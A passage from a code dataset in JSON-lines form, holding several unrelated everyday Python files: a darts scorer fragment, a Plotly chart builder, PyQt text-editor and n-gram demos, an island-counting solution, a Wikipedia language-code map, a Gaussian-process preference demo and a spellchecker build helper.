continue\n elif command == \"reset\":\n if throws == 0:\n print(\"Nie masz rundy do resetowania.\")\n else:\n throws -= 1\n points_left = temp_score + throw_score\n temp_score = points_left\n print(f\"Punkty: {temp_score}\")\n else:\n print(con.wrong_throw)\n continue\n # score updating for next throw/round\n score_board.update({player: temp_score})\n print(\"\\n\")\n\n\n# creating dict and flags\nscore_board = {}\nplaying = False\n","sub_path":"dart_standard_functions.py","file_name":"dart_standard_functions.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"581890041","text":"from data_processing.group_data_multiple import GroupDataMultiple\nimport plotly.express as px\nimport dash_core_components as dcc\n\n\nclass ActualPlot:\n\n @staticmethod\n def build_graph(filenames, time_select, avg_total, is_predicted):\n is_total = True\n if avg_total == 'average':\n is_total = False\n columns = ['Actual']\n if is_predicted:\n columns.append('Predicted')\n\n df = None\n if (isinstance(filenames, str)):\n filenames = [filenames]\n if time_select == 'hourly':\n df = GroupDataMultiple.get_hourly(filenames, columns)\n elif time_select == 'daily':\n df = GroupDataMultiple.get_daily(filenames, is_total, columns)\n elif time_select == 'weekly':\n df = GroupDataMultiple.get_weekly(filenames, is_total, columns)\n else:\n df = GroupDataMultiple.get_monthly(filenames, is_total, columns)\n\n\n fig = px.line(df)\n fig.update_yaxes(title_text='Energy Usage (kw/hr)')\n fig.update_layout(\n xaxis=dict(\n rangeselector=dict(\n buttons=list([\n dict(count=1,\n label=\"1m\",\n step=\"month\",\n stepmode=\"backward\"),\n dict(count=6,\n label=\"6m\",\n step=\"month\",\n stepmode=\"backward\"),\n dict(count=1,\n label=\"YTD\",\n step=\"year\",\n stepmode=\"todate\"),\n dict(count=1,\n label=\"1y\",\n step=\"year\",\n stepmode=\"backward\"),\n dict(step=\"all\")\n ])\n ),\n rangeslider=dict(\n visible=True\n ),\n type=\"date\"\n )\n )\n graph = dcc.Graph(\n figure=fig\n\n )\n return graph\n","sub_path":"chart_builders/actual_plot.py","file_name":"actual_plot.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"51054197","text":"from PyQt5.QtWidgets import QApplication, QWidget, QTextEdit, QVBoxLayout, QPushButton\nimport sys\n\nclass textEditDemo(QWidget):\n def __init__(self):\n super(textEditDemo, self).__init__()\n\n self.setWindowTitle(\"TextEditDemo\")\n self.resize(400, 640)\n\n self.textEdit = QTextEdit()\n self.btnPress1 = QPushButton(\"显示文本\")\n self.btnPress2 = QPushButton(\"显示HTML\")\n\n layout = QVBoxLayout()\n layout.addWidget(self.textEdit)\n layout.addWidget(self.btnPress1)\n layout.addWidget(self.btnPress2)\n self.setLayout(layout)\n\n self.btnPress1.clicked.connect(self.btnPress1_Clicked)\n self.btnPress2.clicked.connect(self.btnPress2_Clicked)\n\n def btnPress1_Clicked(self):\n self.textEdit.setPlainText(\"Hello PyQt5!\\n单击按钮\")\n\n def btnPress2_Clicked(self):\n self.textEdit.setHtml(\"Hello PyQt5!\\n单击按钮。\")\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = textEditDemo()\n win.show()\n sys.exit(app.exec_())","sub_path":"MainWindow/TextEdit/TextEdit.py","file_name":"TextEdit.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"630578488","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 
-*-\n# @Date    : 2019-06-24 21:11:06\n# @Author  : Your Name (you@example.org)\n# @Link    : http://example.org\n# @Version : $Id$\n\nimport os\nimport itertools\nfrom test46 import test46\nimport time\n\n\ndef BFS(adj, start=None):\n    \"\"\"\n    Breadth-first search:\n    look at the neighbours (adjacent nodes) first,\n    then at the neighbours' neighbours,\n    similar to level-order traversal of a binary tree.\n    Repeat visits are prevented by setting a visited flag.\n    \"\"\"\n\n    if not start:\n        start = 0  # start from the first node\n    queue = [start]\n    # visit(start)\n    n = len(adj[0])\n    visited = [0 for i in range(n)]\n    visited[start] = 1\n    while queue:\n        start = queue[0]\n        for i in range(len(adj[start])):\n            if adj[start][i] == 1 and visited[i] == 0:\n                # visit(i)\n                visited[i] = 1\n                queue.append(i)\n        del queue[0]\n    return visited\n\n\nclass Solution:\n    def numIslands(self, grid: list) -> int:\n        if grid == []:\n            return 0\n        # convert the matrix into a graph\n        h = len(grid)\n        w = len(grid[0])\n        coords = list(itertools.product(list(range(h)), list(range(w))))\n        one_coords = []\n        for c in coords:\n            if grid[c[0]][c[1]] == '1':\n                one_coords.append(c)\n        print(\"1 coords\", len(one_coords))\n        input()  # pause for inspection\n        n = len(one_coords)  # 27141 ones\n        start = time.perf_counter()\n        adj = [[0 for i in range(n)] for j in range(n)]  # 27141 * 27141\n        elapsed = (time.perf_counter() - start)  # 43.808438s\n        print(elapsed)\n        input()  # pause for inspection\n        combs = itertools.combinations(list(range(n)), 2)  # 27141 * 27140 / 2\n        for comb in combs:\n            i, j = comb\n            ith_coord = one_coords[i]\n            jth_coord = one_coords[j]\n            if jth_coord in [(ith_coord[0]+1, ith_coord[1]), (ith_coord[0]-1, ith_coord[1]), (ith_coord[0], ith_coord[1]+1), (ith_coord[0], ith_coord[1]-1)]:\n                adj[i][j], adj[j][i] = 1, 1\n\n        # adj, one_coords, n\n        visited = [0 for i in range(n)]\n        # start = 0\n        num_of_islands = 0\n        while 0 in visited:\n            start = visited.index(0)\n            this_visited = BFS(adj, start)\n            for i in range(n):\n                visited[i] = visited[i] ^ this_visited[i]\n            num_of_islands += 1\n\n        return num_of_islands\n\n\ndef main():\n    test1 = [[\"1\", \"1\", \"1\", \"1\", \"0\"],\n             [\"1\", \"1\", \"0\", \"1\", \"0\"],\n             [\"1\", \"1\", \"0\", \"0\", \"0\"],\n             [\"0\", \"0\", \"0\", \"0\", \"0\"]]\n    test2 = [[\"1\", \"1\", \"0\", \"0\", \"0\"],\n             [\"1\", \"1\", \"0\", \"0\", \"0\"],\n             [\"0\", \"0\", \"1\", \"0\", \"0\"],\n             [\"0\", \"0\", \"0\", \"1\", \"1\"]]\n\n    grid = test46\n    \"\"\"\n    test46\n    219 * 250 = 54750 coordinates\n    27141 ones\n    \"\"\"\n    s = Solution()\n    num_of_islands = s.numIslands(grid)\n    print(num_of_islands)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"leetcode/num-of-island-graph-ver1.py","file_name":"num-of-island-graph-ver1.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"24657246","text":"LANGMAP = {\n    \"English\": \"en\",\n    \"Cebuano\": \"ceb\",\n    \"Swedish\": \"sv\",\n    \"German\": \"de\",\n    \"French\": \"fr\",\n    \"Dutch\": \"nl\",\n    \"Russian\": \"ru\",\n    \"Italian\": \"it\",\n    \"Spanish\": \"es\",\n    \"Polish\": \"pl\",\n    \"Waray-Waray\": \"war\",\n    \"Vietnamese\": \"vi\",\n    \"Japanese\": \"ja\",\n    \"Chinese\": \"zh\",\n    \"Portuguese\": \"pt\",\n    \"Ukrainian\": \"uk\",\n    \"Arabic\": \"ar\",\n    \"Persian\": \"fa\",\n    \"Serbian\": \"sr\",\n    \"Catalan\": \"ca\",\n    \"Indonesian\": \"id\",\n    \"Finnish\": \"fi\",\n    \"Korean\": \"ko\",\n    \"Hungarian\": \"hu\",\n    \"Serbo-Croatian\": \"sh\",\n    \"Czech\": \"cs\",\n    \"Romanian\": \"ro\",\n    \"Basque\": \"eu\",\n    \"Turkish\": \"tr\",\n    \"Malay\": \"ms\",\n    \"Esperanto\": \"eo\",\n    \"Bulgarian\": \"bg\",\n    \"Danish\": \"da\",\n    \"Armenian\": \"hy\",\n    \"Hebrew\": \"he\",\n    \"Slovak\": \"sk\",\n    \"Min Nan\": \"zh-min-nan\",\n    \"Min\": \"zh-min-nan\",\n    
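# Hypothetical lookup sketch: the table maps display names (including aliases such as 'Min Nan'/'Min' above) to Wikipedia subdomain codes, so normalising a report row is a plain dict lookup with a fallback:\n#\n#     def wiki_code(language_name, default=None):\n#         return LANGMAP.get(language_name, default)\n#\n#     wiki_code('Swedish')         # -> 'sv'\n#     wiki_code('Min')             # -> 'zh-min-nan'\n#     wiki_code('Klingon', 'en')   # -> 'en' (unknown names fall back)\n    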
\"Kazakh\": \"kk\",\n \"Minangkabau\": \"min\",\n \"Chechen\": \"ce\",\n \"Croatian\": \"hr\",\n \"Lithuanian\": \"lt\",\n \"Estonian\": \"et\",\n \"Belarusian\": \"be\",\n \"Slovenian\": \"sl\",\n \"Slovene\": \"sl\",\n \"Greek\": \"el\",\n \"Galician\": \"gl\",\n \"Azerbaijani\": \"az\",\n \"Azeri\": \"az\", # For some reason pages like https://stats.wikimedia.org/archive/squid_reports/2018-01/SquidReportPageViewsPerCountryBreakdownHuge.htm use \"Azeri\" instead of \"Azerbaijani\" but these seem to be the same thing https://en.wikipedia.org/wiki/Azeri_(disambiguation)\n \"Urdu\": \"ur\",\n \"Simple English\": \"simple\",\n \"Simple\": \"simple\",\n \"Norwegian (Nynorsk)\": \"nn\",\n \"Nynorsk\": \"nn\",\n \"Norwegian (Bokmål)\": \"no\",\n \"Norwegian\": \"no\", # Pages like https://stats.wikimedia.org/archive/squid_reports/2018-01/SquidReportPageViewsPerCountryBreakdownHuge.htm just say \"Norwegian\" without clarifying whether it's Bokmal or Nynorsk or both. However Nynorsk is listed separately, so I assume this is Bokmal.\n \"South Azerbaijani\": \"azb\",\n \"Uzbek\": \"uz\",\n \"Thai\": \"th\",\n \"Hindi\": \"hi\",\n \"Latin\": \"la\",\n \"Georgian\": \"ka\",\n \"Volapük\": \"vo\",\n \"Tamil\": \"ta\",\n \"Welsh\": \"cy\",\n \"Macedonian\": \"mk\",\n \"Asturian\": \"ast\",\n \"Tajik\": \"tg\",\n \"Latvian\": \"lv\",\n \"Malagasy\": \"mg\",\n \"Occitan\": \"oc\",\n \"Tatar\": \"tt\",\n \"Bosnian\": \"bs\",\n \"Kirghiz\": \"ky\",\n \"Kyrghyz\": \"ky\",\n \"Afrikaans\": \"af\",\n \"Albanian\": \"sq\",\n \"Tagalog\": \"tl\",\n \"Cantonese\": \"zh-yue\",\n \"Newar\": \"new\",\n \"Nepal Bhasa\": \"new\",\n \"Telugu\": \"te\",\n \"Bengali\": \"bn\",\n \"Belarusian (Taraškievica)\": \"be-tarask\",\n \"be-tarask\": \"be-tarask\",\n \"Breton\": \"br\",\n \"Piedmontese\": \"pms\",\n \"Malayalam\": \"ml\",\n \"Luxembourgish\": \"lb\",\n \"Javanese\": \"jv\",\n \"Haitian\": \"ht\",\n \"Scots\": \"sco\",\n \"Marathi\": \"mr\",\n \"Irish\": \"ga\",\n \"Swahili\": \"sw\",\n \"Bashkir\": \"ba\",\n \"Low Saxon\": \"nds\",\n \"Western Punjabi\": \"pnb\",\n \"Western Panjabi\": \"pnb\",\n \"Western\": \"pnb\",\n \"Icelandic\": \"is\",\n \"Burmese\": \"my\",\n \"West Frisian\": \"fy\",\n \"Frisian\": \"fy\",\n \"Chuvash\": \"cv\",\n \"Sundanese\": \"su\",\n \"Lombard\": \"lmo\",\n \"Aragonese\": \"an\",\n \"Nepali\": \"ne\",\n \"Yoruba\": \"yo\",\n \"Punjabi\": \"pa\",\n \"Gujarati\": \"gu\",\n \"Ido\": \"io\",\n \"Bavarian\": \"bar\",\n \"Sicilian\": \"scn\",\n \"Kurdish\": \"ku\",\n \"Alemannic\": \"als\",\n \"Bishnupriya Manipuri\": \"bpy\",\n \"Kannada\": \"kn\",\n \"Sorani\": \"ckb\",\n \"Interlingua\": \"ia\",\n \"Quechua\": \"qu\",\n \"Egyptian Arabic\": \"arz\",\n \"Egyptian\": \"arz\",\n \"Wu\": \"wuu\",\n \"Mongolian\": \"mn\",\n \"Samogitian\": \"bat-smg\",\n \"Sinhalese\": \"si\",\n \"Sinhala\": \"si\",\n \"Walloon\": \"wa\",\n \"Oriya\": \"or\",\n \"Scottish Gaelic\": \"gd\",\n \"Yiddish\": \"yi\",\n \"Amharic\": \"am\",\n \"Neapolitan\": \"nap\",\n \"Min Dong\": \"cdo\",\n \"Buginese\": \"bug\",\n \"Upper Sorbian\": \"hsb\",\n \"Banyumasan\": \"map-bms\",\n \"Maithili\": \"mai\",\n \"mai\": \"mai\",\n \"Mingrelian\": \"xmf\",\n \"xmf\": \"xmf\",\n \"Faroese\": \"fo\",\n \"Mazandarani\": \"mzn\",\n \"Limburgish\": \"li\",\n \"Ilokano\": \"ilo\",\n \"Sakha\": \"sah\",\n \"Emilian-Romagnol\": \"eml\",\n \"Venetian\": \"vec\",\n \"Ossetian\": \"os\",\n \"Sanskrit\": \"sa\",\n \"Sindhi\": \"sd\",\n \"Hill Mari\": \"mrj\",\n \"Zazaki\": \"diq\",\n \"Meadow Mari\": \"mhr\",\n \"Eastern Mari\": 
\"mhr\",\n \"Pashto\": \"ps\",\n \"Fiji Hindi\": \"hif\",\n \"Tarantino\": \"roa-tara\",\n \"Classical Chinese\": \"zh-classical\",\n \"Central Bicolano\": \"bcl\",\n \"Acehnese\": \"ace\",\n \"Hakka\": \"hak\",\n \"North Frisian\": \"frr\",\n \"frr\": \"frr\",\n \"Kapampangan\": \"pam\",\n \"Silesian\": \"szl\",\n \"Northern Sotho\": \"nso\",\n \"Northern Sami\": \"se\",\n \"Khmer\": \"km\",\n \"Navajo\": \"nv\",\n \"Western Armenian\": \"hyw\",\n \"Maori\": \"mi\",\n \"Rusyn\": \"rue\",\n \"rue\": \"rue\",\n \"Nahuatl\": \"nah\",\n \"Dutch Low Saxon\": \"nds-nl\",\n \"West Flemish\": \"vls\",\n \"Bihari\": \"bh\",\n \"Crimean Tatar\": \"crh\",\n \"Gan\": \"gan\",\n \"Sardinian\": \"sc\",\n \"Vepsian\": \"vep\",\n \"Tibetan\": \"bo\",\n \"Gilaki\": \"glk\",\n \"Corsican\": \"co\",\n \"Erzya\": \"myv\",\n \"Turkmen\": \"tk\",\n \"Võro\": \"fiu-vro\",\n \"Assamese\": \"as\",\n \"Somali\": \"so\",\n \"Northern Luri\": \"lrc\",\n \"Komi\": \"kv\",\n \"Kashubian\": \"csb\",\n \"Cashubian\": \"csb\",\n \"Manx\": \"gv\",\n \"Shan\": \"shn\",\n \"Udmurt\": \"udm\",\n \"Zeelandic\": \"zea\",\n \"Zealandic\": \"zea\",\n \"Interlingue\": \"ie\",\n \"Picard\": \"pcd\",\n \"pcd\": \"pcd\",\n \"Aymara\": \"ay\",\n \"Shona\": \"sn\",\n \"Uyghur\": \"ug\",\n \"Uighur\": \"ug\",\n \"Norman\": \"nrm\",\n \"Saterland Frisian\": \"stq\",\n \"Lezgian\": \"lez\",\n \"lez\": \"lez\",\n \"Ladino\": \"lad\",\n \"Cornish\": \"kw\",\n \"Mirandese\": \"mwl\",\n \"Goan Konkani\": \"gom\",\n \"gom\": \"gom\",\n \"Guarani\": \"gn\",\n \"Hawaiian\": \"haw\",\n \"Romansh\": \"rm\",\n \"Ligurian\": \"lij\",\n \"Hausa\": \"ha\",\n \"Abkhazian\": \"ab\",\n \"Komi-Permyak\": \"koi\",\n \"koi\": \"koi\",\n \"Kabyle\": \"kab\",\n \"Maltese\": \"mt\",\n \"Lao\": \"lo\",\n \"Laotian\": \"lo\",\n \"Lingua Franca Nova\": \"lfn\",\n \"Friulian\": \"fur\",\n \"Franco-Provençal\": \"frp\",\n \"Lower Sorbian\": \"dsb\",\n \"Lingala\": \"ln\",\n \"Anglo-Saxon\": \"ang\",\n \"Extremaduran\": \"ext\",\n \"Livvi-Karelian\": \"olo\",\n \"Zamboanga Chavacano\": \"cbk-zam\",\n \"Doteli\": \"dty\",\n \"Divehi\": \"dv\",\n \"Ripuarian\": \"ksh\",\n \"Gagauz\": \"gag\",\n \"gag\": \"gag\",\n \"Pali\": \"pi\",\n \"Pangasinan\": \"pag\",\n \"Palatinate German\": \"pfl\",\n \"Avar\": \"av\",\n \"Banjar\": \"bjn\",\n \"bjn\": \"bjn\",\n \"Buryat\": \"bxr\",\n \"Kalmyk\": \"xal\",\n \"Gorontalo\": \"gor\",\n \"Karachay-Balkar\": \"krc\",\n \"krc\": \"krc\",\n \"Papiamentu\": \"pap\",\n \"Zhuang\": \"za\",\n \"Karakalpak\": \"kaa\",\n \"Pennsylvania German\": \"pdc\",\n \"Kinyarwanda\": \"rw\",\n \"Tuvan\": \"tyv\",\n \"Tongan\": \"to\",\n \"Greenlandic\": \"kl\",\n \"Novial\": \"nov\",\n \"Jamaican Patois\": \"jam\",\n \"Aramaic\": \"arc\",\n \"Kabiye\": \"kbp\",\n \"Kabardian Circassian\": \"kbd\",\n \"Tok Pisin\": \"tpi\",\n \"Tetum\": \"tet\",\n \"Igbo\": \"ig\",\n \"Kikuyu\": \"ki\",\n \"Nauruan\": \"na\",\n \"Lojban\": \"jbo\",\n \"Lak\": \"lbe\",\n \"Aromanian\": \"roa-rup\",\n \"Tahitian\": \"ty\",\n \"Bislama\": \"bi\",\n \"Kongo\": \"kg\",\n \"Moksha\": \"mdf\",\n \"Wolof\": \"wo\",\n \"Luganda\": \"lg\",\n \"Ganda\": \"lg\",\n \"Zulu\": \"zu\",\n \"Sranan\": \"srn\",\n \"Tulu\": \"tcy\",\n \"Ingush\": \"inh\",\n \"Atikamekw\": \"atj\",\n \"Cherokee\": \"chr\",\n \"Latgalian\": \"ltg\",\n \"ltg\": \"ltg\",\n \"Samoan\": \"sm\",\n \"Xhosa\": \"xh\",\n \"Oromo\": \"om\",\n \"Santali\": \"sat\",\n \"Norfolk\": \"pih\",\n \"Old Church Slavonic\": \"cu\",\n \"Romani\": \"rmy\",\n \"Twi\": \"tw\",\n \"Bambara\": \"bm\",\n \"Tswana\": \"tn\",\n 
\"Setswana\": \"tn\",\n \"Cheyenne\": \"chy\",\n \"Kirundi\": \"rn\",\n \"Gothic\": \"got\",\n \"Tsonga\": \"ts\",\n \"Tumbuka\": \"tum\",\n \"Akan\": \"ak\",\n \"Sesotho\": \"st\",\n \"Chichewa\": \"ny\",\n \"Chamorro\": \"ch\",\n \"Swati\": \"ss\",\n \"Siswati\": \"ss\",\n \"Pontic\": \"pnt\",\n \"Fijian\": \"fj\",\n \"Inuktitut\": \"iu\",\n \"Adyghe\": \"ady\",\n \"Ewe\": \"ee\",\n \"Kashmiri\": \"ks\",\n \"Venda\": \"ve\",\n \"Inupiak\": \"ik\",\n \"Sango\": \"sg\",\n \"Sangro\": \"sg\", # This shows up in 2017-09; I think it's a typo\n \"Fula\": \"ff\",\n \"Dzongkha\": \"dz\",\n \"Tigrinya\": \"ti\",\n \"Cree\": \"cr\",\n \"Dinka\": \"din\",\n \"Ndonga\": \"ng\",\n \"Choctaw\": \"cho\",\n \"Kuanyama\": \"kj\",\n \"Marshallese\": \"mh\",\n \"Hiri Motu\": \"ho\",\n \"Sichuan Yi\": \"ii\",\n \"Afar\": \"aa\",\n \"Muscogee\": \"mus\",\n \"Herero\": \"hz\",\n \"Kanuri\": \"kr\",\n \"Low\": \"nds\", # This page (https://stats.wikimedia.org/wikimedia/squids/SquidReportPageViewsPerLanguageBreakdown.htm) indicates that \"Low\" is Low Saxon\n \"ten\": \"en\", # ten.wikipedia.org was a temporary wiki for the 10-year anniversary of Wikipedia. For ease, I will count the views on this under English Wikipedia\n \"nb\": \"no\", # Verified that nb.wikipedia.org redirects to no.wikipedia.org\n \"zh-tw\": \"zh\", # Verified that zh-tw.wikipedia.org redirects to zh.wikipedia.org; see also https://en.wikipedia.org/wiki/Chinese_Wikipedia#Automatic_conversion_between_traditional_and_simplified_Chinese_characters\n}\n","sub_path":"langmap.py","file_name":"langmap.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"646742547","text":"# Simple 1D GP classification example\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport GPpref\nimport scipy.optimize as op\nimport plot_tools as ptt\nimport test_data\n# from scipy.stats import beta\nplt.rc('font',**{'family':'serif','sans-serif':['Computer Modern Roman']})\nplt.rc('text', usetex=True)\nnp.random.seed(1)\n\ntrain_hyper = True\nuse_test_data = False\nverbose = True\n\n#log_hyp = np.log([0.2, 0.5, 0.1, 1.0, 10.0]) # length_scale/s, sigma_f, sigma_n_abs, sigma_beta, v_beta\n# log_hyp = np.log([0.07, 1.0, 0.25, 1.0, 28.1])\n# log_hyp = np.log([0.065, 0.8, 0.8, 0.8, 20.0])\nlog_hyp = np.log([0.05, 1.5, 0.09, 2.0, 50.0])\nnp.random.seed(0)\n\nn_rel_train = 30\nn_abs_train = 30\nrel_sigma = 0.02\ndelta_f = 1e-5\n\nbeta_sigma = 0.8\nbeta_v = 100.0\n\nn_xplot = 101\nn_mcsamples = 1000\nn_ysamples = 101\n\n# Define polynomial function to be modelled\n#true_function = test_data.zero_fun\nrandom_wave = test_data.VariableWave([0.6, 1.2], [5.0, 10.0], [0.0, 1.0], [10.0, 20.0])\nrandom_wave.randomize()\nrandom_wave.set_values(a=1.2, f=6.0, o=.2, d=20.0)\ntrue_function = random_wave.out\nrandom_wave.print_values()\n\nrel_obs_fun = GPpref.RelObservationSampler(true_function, GPpref.PrefProbit(sigma=rel_sigma))\nabs_obs_fun = GPpref.AbsObservationSampler(true_function, GPpref.AbsBoundProbit(sigma=beta_sigma, v=beta_v))\n\n# Main program\n# True function\nx_plot = np.linspace(0.0,1.0,n_xplot,dtype='float')\nx_test = np.atleast_2d(x_plot).T\nf_true = abs_obs_fun.f(x_test)\nmu_true = abs_obs_fun.mean_link(x_test)\nmc_samples = np.random.normal(size=n_mcsamples)\nabs_y_samples = np.atleast_2d(np.linspace(0.01, 0.99, n_ysamples)).T\np_abs_y_true = abs_obs_fun.observation_likelihood_array(x_test, abs_y_samples)\np_rel_y_true = 
rel_obs_fun.observation_likelihood_array(x_test)\n\n# Training data - this is a bit weird, but we sample x values, then the uv pairs\n# are actually indexes into x, because it is easier computationally. You can \n# recover the actual u,v values using x[ui],x[vi]\nif use_test_data:\n x_rel, uvi_rel, uv_rel, y_rel, fuv_rel, x_abs, y_abs, mu_abs = test_data.data1()\nelse:\n x_rel, uvi_rel, uv_rel, y_rel, fuv_rel = rel_obs_fun.generate_n_observations(n_rel_train)\n x_abs, y_abs, mu_abs = abs_obs_fun.generate_n_observations(n_abs_train)\n\n# Construct GP object\nprefGP = GPpref.PreferenceGaussianProcess(x_rel, uvi_rel, x_abs, y_rel, y_abs,\n delta_f=delta_f,\n rel_likelihood=GPpref.PrefProbit(),\n abs_likelihood=GPpref.AbsBoundProbit(), verbose=verbose)\n\n# If training hyperparameters, use external optimiser\nif train_hyper:\n log_hyp = op.fmin(prefGP.calc_nlml,log_hyp)\n\nf = prefGP.calc_laplace(log_hyp)\nprefGP.print_hyperparameters()\n\n# Latent predictions\nfhat, vhat = prefGP.predict_latent(x_test)\n\n# Expected values\nE_y = prefGP.abs_posterior_mean(x_test, fhat, vhat)\n\n# Posterior likelihoods (MC sampled for absolute)\np_abs_y_post = prefGP.abs_posterior_likelihood(abs_y_samples, fhat=fhat, varhat=vhat, normal_samples=mc_samples)\np_rel_y_post = prefGP.rel_posterior_likelihood_array(fhat=fhat, varhat=vhat)\n\n\n# Plot true functions\nfig_t, (ax_t_l, ax_t_a, ax_t_r) = ptt.true_plots(x_test, f_true, mu_true, rel_sigma,\n abs_y_samples, p_abs_y_true, p_rel_y_true,\n x_abs, y_abs, uv_rel, fuv_rel, y_rel,\n t_l=r'True latent function, $f(x)$')\n\n# Posterior estimates\nfig_p, (ax_p_l, ax_p_a, ax_p_r) = \\\n ptt.estimate_plots(x_test, f_true, mu_true, fhat, vhat, E_y, rel_sigma,\n abs_y_samples, p_abs_y_post, p_rel_y_post,\n x_abs, y_abs, uv_rel, fuv_rel, y_rel,\n t_a=r'Posterior absolute likelihood, $p(y | \\mathcal{Y}, \\theta)$',\n t_r=r'Posterior relative likelihood $P(x_0 \\succ x_1 | \\mathcal{Y}, \\theta)$')\n\nplt.show()\n\n\n## SCRAP\n# p_y = np.zeros((n_ysamples, n_xplot))\n# y_samples = np.linspace(0.01, 0.99, n_ysamples)\n# iny = 1.0/n_ysamples\n# E_y2 = np.zeros(n_xplot)\n#\n# normal_samples = np.random.normal(size=n_mcsamples)\n# for i,(fstar,vstar) in enumerate(zip(fhat, vhat.diagonal())):\n# f_samples = normal_samples*vstar+fstar\n# aa, bb = prefGP.abs_likelihood.get_alpha_beta(f_samples)\n# p_y[:, i] = [iny*np.sum(beta.pdf(yj, aa, bb)) for yj in y_samples]\n# p_y[:, i] /= np.sum(p_y[:, i])\n# E_y2[i] = np.sum(np.dot(y_samples, p_y[:, i]))","sub_path":"GP_preference_demo.py","file_name":"GP_preference_demo.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"375829699","text":"# -*- coding:utf-8 -*-\n\nimport os\n\nfrom hunspell import module_paths_from_filters, build_files\n\nimport common\n\n\nclass Manager(object):\n\n def __init__(self):\n\n self.builtSpellCheckers = {}\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n\n for path in self.builtSpellCheckers.iterkeys():\n os.remove(path + u\".aff\")\n os.remove(path + u\".dic\")\n\n try:\n os.rmdir(common.getBuildPath())\n except:\n pass\n\n def getUnusedCode(self):\n\n buildPath = common.getBuildPath()\n\n if not os.path.exists(buildPath):\n return 1\n\n index = 2\n while os.path.exists(os.path.join(buildPath, u\"{}.aff\".format(index))):\n index += 1\n return index\n\n def create(self, config):\n\n for builtPath, builtConfig in self.builtSpellCheckers.iteritems():\n if config == 
builtConfig:\n return builtPath\n\n module_paths = module_paths_from_filters(config,\n language=config[\"language\"])\n file_name = unicode(self.getUnusedCode())\n folder_path = common.getBuildPath()\n build_files(module_paths=module_paths, language=config[\"language\"],\n output_file_name=file_name, output_folder=folder_path)\n path = os.path.join(folder_path, file_name)\n self.builtSpellCheckers[path] = config\n return path\n","sub_path":"tests/module_tests/spellchecker.py","file_name":"spellchecker.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"464239052","text":"#!/usr/bin/env python\n\nimport sys\nfrom collections import Counter\nfrom PyQt4 import QtGui, QtCore\n\nclass Ngram(QtGui.QWidget):\n\n def __init__(self):\n super(Ngram, self).__init__()\n self.setWindowTitle(\"Unigrams\")\n self.initUI()\n\n def initUI(self):\n self.cbox = QtGui.QComboBox()\n self.cbox.addItems([\"Bigrams\", \"Unigrams\"])\n self.cbox.currentIndexChanged.connect(self.gramSelect)\n\n self.pbut = QtGui.QPushButton('File', self)\n self.pbut.clicked.connect(self.showGrams)\n\n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n self.setLayout(self.grid)\n self.grid.addWidget(self.cbox, 1, 0)\n self.grid.addWidget(self.pbut, 1, 1)\n\n self.show()\n\n def gramSelect(self):\n bigram = True\n if self.cbox.currentText() == \"Unigrams\":\n bigram = False\n return bigram\n\n def showGrams(self):\n self.infile = QtGui.QFileDialog.getOpenFileName(self)\n\n while self.grid.count():\n child = self.grid.takeAt(0)\n if child.widget() is not None:\n child.widget().deleteLater()\n elif child.layout() is not None:\n clearLayout(child.layout())\n\n if self.gramSelect() == False:\n for i, (word, freq) in enumerate(self.unigramCounter()):\n self.grid.addWidget(QtGui.QLabel(word), i, 0)\n self.grid.addWidget(QtGui.QLabel(str(freq)), i, 1)\n\n else:\n for i, (bigram, freq) in enumerate(self.bigramCounter()):\n self.grid.addWidget(QtGui.QLabel(bigram[0]), i, 0)\n self.grid.addWidget(QtGui.QLabel(bigram[1]), i, 1)\n self.grid.addWidget(QtGui.QLabel(str(freq)), i, 2)\n\n def unigramCounter(self):\n self.uniCounter = Counter()\n for line in open(self.infile):\n self.uniCounter.update(line.split())\n return self.uniCounter.most_common(20)\n\n def bigramCounter(self):\n self.ngramCounter = Counter()\n self.listOfBigrams = []\n\n for line in open(self.infile):\n self.sentence = line.split()\n self.bigramList = []\n for i in range(len(self.sentence) - 1):\n self.bigram = self.sentence[i], self.sentence[i + 1]\n self.bigramList.append(self.bigram)\n self.ngramCounter.update(self.bigramList)\n self.listOfBigrams.append(self.bigramList)\n\n return self.ngramCounter.most_common(20)\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n n = Ngram()\n app.exec_()\n","sub_path":"tel_ngram.py","file_name":"tel_ngram.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"104358218","text":"# UPLOAD_Process_MONTHLY_CSV_Files.py\nimport logging\nimport pyodbc\nimport os\nimport csv\nfrom datetime import datetime\nfrom collections import OrderedDict\n\nimport sys\nif len(sys.argv) < 2:\n print('missing arg[1]')\n sys.exit()\n\nprint(sys.argv[0])\nprint(sys.argv[1])\nenvironment_list = ['local','dev','prod']\ndatabase = 'VFH'\nif sys.argv[1] == 'local':\n server = 'DESKTOP-9NHID61'\n logging_filename = 
